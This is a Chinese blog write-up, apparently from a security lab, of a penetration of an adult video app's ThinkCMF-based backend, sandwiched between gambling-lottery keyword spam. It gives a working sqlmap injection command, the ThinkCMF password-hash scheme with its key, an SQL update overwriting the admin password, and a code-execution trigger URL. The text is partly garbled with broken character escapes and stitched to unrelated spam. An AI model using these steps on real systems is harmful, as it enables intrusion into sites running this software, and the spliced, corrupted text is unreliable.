北京赛车pk10经验论坛 北京赛车pk10代理流水 北京赛车pk10四码盈利 北京赛车pk10输少赢多 北京赛车pk10刷图软件 下载北京赛车pk10微信 北京赛车pk10下载苹果 易算北京赛车pk10软件 北京赛车pk10绝密规律 易算北京赛车pk10手机 北京赛车pk10代理流水 北京赛车pk10个人技巧 北京赛车pk10龙虎规律 北京赛车pk10代理佣金 北京赛车pk10系统出租 北京赛车pk10停了 北京赛车pk10计划苹果 北京赛车pk10微信群二维码 北京赛车pk10追开软件 北京赛车pk10十名走势图 北京赛车pk10网页 北京赛车pk10苹果版下载 2017北京赛车pk10稳赢 北京赛车pk10技巧5码公式 北京赛车pk10公式软件 银河北京赛车pk10平台 北京赛车pk10计算概率 北京赛车pk107码技巧 北京赛车pk10下注平台 北京赛车pk10appios

“净网2019”打击网络色情,实录渗透某成人“抖音”

作者:Ms08067安全实验室 / 微信号:Ms08067_com 发布日期:2019-07-10

本文作者:曲云杰(MS08067实验室合伙人 & Web小组组长)起因
经排查发现该app为成人版"抖音",响应国家净网行动,坚决打击非法传播传播淫秽物品行为!经过
下载该app,并?#20113;?#36827;行测试。
使用BurpSuite抓包,环境为:
夜神模拟器(安卓4)+Xpose框架+Just trust me 框架
发现该app是从某web地址:www.xxxxx.com的接口回调过来的。排查web资产域名注册信息
Ps:这类网站域名注册信息大部分为虚假?#27169;?#25152;以这里暂时不对域名注册人、联系邮箱等信息展开搜集。其它资产信息
Web指纹:网宿CDN,PHP,Nginx,ThinkCMF语言:PHP服务器:网宿CDN操作系统:Linux
超级ping结果证实的确有CDN防护,那么就没有端口扫描的必要了。
尝试ThinkCMF默认后台地址
得到信息:
官网地址:www.yunbaokj.com (疑似该视频系统开发商)
在之后的测试中,确定该套系统为云豹直播系统(由ThinkCMF二次开发)系?#25104;?#35745;
从网上下载到了云豹直播系统的源码
?#20284;?#24456;好,审计到了几处前端注入(不需要会员登陆)
注入一:
文件位置:
/application/Home/Controller/PlaybackController.class.php
注入链接:http://www.xxx.com/index.php?
g=Home&m=Playback&touid=1
经测试,目标并不存在此处注入。
注入二:
文件位置:
/application/Appapi/Controller/VideoController.class.php
注入链接:http://www.xxx.com/index.php?
g=Appapi&m=Video&videoid=1
此处注入目标就存在啦~
Ps?#21512;低成?#35745;工程十分感谢我的好友 Joseph 对我的帮助!真挚的感谢!注入过程踩坑与填坑
手工测试之后发现目标并没有waf之类的防护,直接扔sqlmap?#35805;?#26797;。
但是过程中发现能识别注入类型但不能注入出 数据,之后才发现是因为闭合问题。
给出sqlmap语句:
sqlmap -u 'http://www.xxxxxx.cn/index.php?
g=Appapi&m=Video&videoid=1*' --prefix "1)"
--force-ssl -v3
注入后台管理账号密码数据
密码密文:###8c333e2bd6081a934f64a003514fd61c
非常规密?#27169;?#20877;跟进一下ThinkCMF?#29992;?#26041;式
public function setPass($pass)
{ $authcode='rCt52pF2cnnKNB3Hkp'; $pass="###"
.md5(md5($authcode.$pass)); return $pass; }
如果明文密码很复杂,那几乎是没有机会能解开的。
?#20449;?#21451;说https://cmd5.la/能解开。但是事实是很让人心碎的。
注入查看当前用户权限
权限非常非常低,思路受阻。柳暗花明又一村
当时因为外出有事,带的是另一台电脑,当我重新注入时有了新的发现,并且很重要!
竟然多了一种注入类型:堆叠注入
因为我们之前研究过了ThinkCMF的算法,那现在我们直接生成一个新的密?#27169;?#28982;后update管理员的密?#27169;琯etshell之后再改回来。
新密文:
###73b13b8b4d767f6c3c2953f123d1a721
管理员最后登陆时间
可以大胆放心的搞(admin不是管理常用账号,但仍然是超级管理员账号)
修改密文(sqlmap的sql-shell):
update cmf_users set user_pass=
'###73b13b8b4d767f6c3c2953f123d1a721'
where user_login='admin'
成功登陆:
这里需要注意两个地方,与网上文章不同,可能是因为网上方法以版本1.6.0为基础,而目标版本为X2.1.0
1.X2.1.0版本中插入恶意代码的字段为
cmf_auth_rule,
而不是sp_auth_rule
2.触发链接为
http://www.xxx.cn/index.php?
g=Portal&m=AdminPage&a=add&2=phpinfo();,
而不是
http://www.xxx.cn/index.php?
g=Portal&m=AdminPage&a=add结尾
已经对服务器日志等?#34892;?#35777;据进行打包,后续将移交相关部门。
好好学习,天天向上,远离黄赌毒!
来源:Ms08067安全实验室
界世的你当
作你的肩膀
ms08067安全实验室
北京赛车pk10有妙招吗
20选5开奖号 猿人传奇电子游艺 新浪彩票双色球 5分赛车走势图 飞禽走兽游戏漏洞 去法国马赛 BBIN体育直播下载官网直达 北京赛车pk10迪士尼 刀塔自走棋英雄 西班牙巴拉多利德市 丛林快讯电子 山东群英会现场直播